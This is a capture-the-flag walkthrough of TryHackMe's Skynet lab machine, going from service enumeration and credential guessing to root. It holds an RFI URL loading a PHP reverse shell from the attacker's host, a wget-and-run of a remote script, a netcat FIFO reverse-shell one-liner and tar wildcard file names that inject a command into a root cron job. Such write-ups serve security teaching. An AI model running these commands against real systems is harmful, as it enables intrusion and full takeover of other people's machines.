TryHackMe Skynet writeup

TryHackMe Skynet writeup

Skynet is the fifth machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path

Enumeration

Let’s start with the nmap scan:

nmap -sC -sV -o nmap.txt <target_ip>

22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X 
143/tcp open  imap        Dovecot imapd

As there is a port 80 open, let’s also run the gobuster:

gobuster dir -u http://<target_ip> -w /usr/share/seclists/Discovery/Web-Content/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://<target_ip>
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/19 03:58:37 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/admin (Status: 301)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
===============================================================
2020/10/19 03:58:57 Finished
===============================================================

We discovered /squirrelmail directory, but it required authorization.

Let’s enumerate more! We still have services that we didn’t check yet. What about smb?

smbmap -H  <target_ip>
[+] Guest session       IP: <target_ip>:445    Name: <target_ip>                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        anonymous                                               READ ONLY       Skynet Anonymous Share
        milesdyson                                              NO ACCESS       Miles Dyson Personal Share
        IPC$                                                    NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))

It seems that only anonymous is readable without authorization. It’s a good idea to check what is inside:

smbclient \\\\<target_ip>\\anonymous

smb: \> ls
  .                                   D        0  Wed Sep 18 00:41:20 2019
  ..                                  D        0  Tue Sep 17 03:20:17 2019
  attention.txt                       N      163  Tue Sep 17 23:04:59 2019
  logs                                D        0  Wed Sep 18 00:42:16 2019
  books                               D        0  Wed Sep 18 00:40:06 2019

9204224 blocks of size 1024. 5373504 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)

smb: \> cd logs
smb: \logs\> ls
  .                                   D        0  Wed Sep 18 00:42:16 2019
  ..                                  D        0  Wed Sep 18 00:41:20 2019
  log2.txt                            N        0  Wed Sep 18 00:42:13 2019
  log1.txt                            N      471  Wed Sep 18 00:41:59 2019
  log3.txt                            N        0  Wed Sep 18 00:42:16 2019

The content of attention.txt is:

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

Only log1.txt in the \logs is worth looking, as it contains a list of possible passwords:

cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

A short sum-up of the enumeration phase:

  • we have milesdyson as a potential username

  • we have the list of potential passwords

  • we have two places to try them out: ssh and squirrel mail

It less likely that ssh will be our way in, so let’s give squirrel mail a try.

Try to find the correct password for user milesdyson on http://<target_ip>/squirrelmail/src/login.php.

I used Burp Suite for that, Hydra would also do the trick, but you can do it manually, it will not take long. wink

Alright, we are in! Let’s check the emails.

One of them is very interesting, others are useless.

The email with the subject Samba Password reset will cough your eye immediately:

We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`

This email was sent from skynet@skynet to the milesdyson, so now we have the password from smb share!

Login to the smb with this password and look around.

You will find the file that pointing out that something interesting can be found at the /45kra24zxs28v3yd.

We didn’t find that directory in the smb, let’s check, maybe it’s on port 80?

Navigate to the http://<target_ip>/45kra24zxs28v3yd/ and check what’s there.

Not so useful, huh?

Fire up your gobuster one more time:

gobuster dir -u http://<target_ip>/45kra24zxs28v3yd/ -w /usr/share/seclists/Discovery/Web-Content/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://<target_ip>/45kra24zxs28v3yd/
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/19 04:21:37 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/index.html (Status: 200)
===============================================================
2020/10/19 04:21:58 Finished
===============================================================

Yet another vector! The /administrator directory leads us to the login form of the Cuppa CMS. Unfortunately, the credentials that we already have will not work here.

Let’s look for other ways in.

We don’t know the version of the Cuppa CMS, but it will not harm anyone if we will check for the available exploits.


\> Exploitation

searchsploit cuppa

Cuppa CMS - '/alertConfigField.php' Local/Remote File | php/webapps/25971.txt

We have only one RFI. As we don’t have any other ideas, let’s try it out:

Grab a copy of php-reverse-shell.php from PentestMonkey, specify your IP and port.

Open nc listener:

sudo nc -nlvp 1337

Open the web server in the folder with your reverse shell:

 sudo python -m SimpleHTTPServer 80

Finally, let’s trigger the exploit itself:

http://<target_ip>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<your_ip>/php-reverse-shell.php

Catch your shell!

You can upgrade your shell by

/usr/bin/script -qc /bin/bash /dev/null

\> PrivEsc

Transport your favorite tool for privilege escalations to the machine. As we already have SimpleHTTPServer on port 80 you can use it.

cd to the folder where you have access to writing (/tmp for instance) and download the tool.

I will use Linux Smart Enumeration this time:

www-data@skynet:/tmp$ wget http://<your_ip>/lse.sh
www-data@skynet:/tmp$ chmod +x lse.sh
www-data@skynet:/tmp$ ./lse.sh

lse has a great -l flag, which allows you to specify how many details will be shown. I can recommend starting without it, and if you will not find anything useful, run lse.sh again with -l 1, -l 2 or -l 3 accordingly.

You will eventually spot the CRON job is running on /home/milesdyson/backups/backup.sh. Let’s investigate:

www-data@skynet:/tmp$ ls -la /home/milesdyson/backups/backup.sh
-rwxr-xr-x 1 root root 74 Sep 17  2019 /home/milesdyson/backups/backup.sh

www-data@skynet:/tmp$ cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

So, we can’t edit the file, but what we can do, is the exploitation of the wildcard in the script.

You can read more about this vulnerability here.

Navigate to the /var/www/html and do the following:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> <your_port> >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

Wait for a CRON job to execute your shell.sh.

Catch the root shell!


\> Takeaway

  • Enumeration can easily take half of the time of work on the machine.

  • “Connecting the dots” is a useful skill for penetration testing.

  • Take your time with the exploitation of the CRON jobs, can take a while to be executed.